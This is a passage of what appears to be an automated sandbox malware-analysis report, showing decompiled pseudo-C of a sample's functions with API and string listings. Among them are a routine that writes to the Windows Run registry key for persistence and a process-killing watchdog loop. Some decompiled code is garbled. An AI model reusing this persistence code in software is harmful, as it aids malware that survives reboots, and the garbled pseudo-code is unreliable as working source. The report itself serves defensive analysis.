				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
